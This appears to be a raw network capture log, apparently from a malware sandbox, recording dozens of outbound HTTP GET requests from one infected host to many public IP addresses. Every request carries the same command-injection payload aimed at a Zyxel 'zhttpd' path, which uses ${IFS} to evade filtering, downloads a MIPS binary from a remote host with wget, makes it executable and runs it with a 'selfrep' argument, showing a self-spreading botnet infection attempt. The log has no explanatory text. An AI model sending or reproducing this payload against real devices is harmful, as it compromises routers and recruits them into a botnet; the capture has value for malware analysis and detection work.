                                                Jan 28, 2024 10:16:42.058505058 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8731192.168.2.2337214200.211.92.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.058517933 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8732192.168.2.2335866151.127.135.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.058541059 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8733192.168.2.2355506197.78.84.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.058587074 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8734192.168.2.235523489.79.130.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.058619022 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8735192.168.2.234194887.48.208.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.058644056 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8736192.168.2.233686649.36.252.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.058676004 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8737192.168.2.2338232202.11.0.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.058705091 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8738192.168.2.2340756141.71.57.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.058753967 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8739192.168.2.2347708116.16.65.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.058774948 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8740192.168.2.2348874184.139.136.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.058804989 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8741192.168.2.2354410146.180.248.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.058830023 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8742192.168.2.235400464.6.87.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.058864117 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8743192.168.2.2336040195.251.232.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.058876038 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8744192.168.2.2358064139.113.185.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.058895111 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8745192.168.2.2346756166.227.218.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.058932066 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8746192.168.2.2355888194.125.80.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.058980942 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8747192.168.2.234835285.95.61.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.058999062 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8748192.168.2.235210093.126.56.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.059019089 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8749192.168.2.2349520111.133.182.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.059027910 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8750192.168.2.2353346203.25.120.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.059084892 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8751192.168.2.2342504157.218.96.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.059097052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8752192.168.2.2360626188.183.35.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.059123993 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8753192.168.2.235813634.52.228.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.059158087 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8754192.168.2.2346628116.141.188.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.059166908 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8755192.168.2.2360616197.70.142.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.059210062 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8756192.168.2.235307059.26.145.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.059227943 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8757192.168.2.2348896187.251.207.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.059273958 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8758192.168.2.2354422223.139.178.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.059273958 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8759192.168.2.234956439.32.100.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.059281111 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8760192.168.2.2352166196.144.77.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.059303045 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8761192.168.2.2336374151.142.229.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.059334993 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8762192.168.2.235171040.205.22.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.059334993 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8763192.168.2.235862018.38.248.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.059374094 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8764192.168.2.2347560201.71.116.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.059396982 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8765192.168.2.2355664187.32.169.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.059402943 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8766192.168.2.2341632191.32.102.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.059465885 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8767192.168.2.2351174174.89.30.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.059492111 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8768192.168.2.2347558202.178.86.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.059494972 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8769192.168.2.2337402182.85.8.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.059528112 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8770192.168.2.23436388.246.105.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.059607983 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8771192.168.2.2360172110.220.132.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.059621096 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8772192.168.2.2359256149.253.173.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.059632063 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8773192.168.2.2338516158.26.5.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.059664965 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8774192.168.2.235480284.75.66.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.059676886 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8775192.168.2.235272069.35.33.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.059721947 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8776192.168.2.2354994100.205.25.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.059741974 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8777192.168.2.2341304105.109.79.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.059745073 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8778192.168.2.233649875.216.200.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.059794903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8779192.168.2.234797876.187.216.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.059801102 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8780192.168.2.23450785.233.205.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.059818983 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8781192.168.2.2355586142.13.102.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.059844017 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8782192.168.2.2343014156.253.224.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.059871912 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8783192.168.2.2353360183.228.156.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.059892893 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8784192.168.2.2341088195.242.126.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.059920073 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8785192.168.2.2342876161.46.106.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.059950113 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8786192.168.2.2350382200.204.155.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.059993982 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8787192.168.2.235842076.163.254.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.060024977 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8788192.168.2.234443812.127.169.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.060029030 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8789192.168.2.2337990104.18.26.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.060055971 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8790192.168.2.2336972110.159.187.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.060056925 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8791192.168.2.234206443.13.203.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.060082912 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8792192.168.2.233375072.23.101.228443
                                                TimestampBytes transferredDirectionData
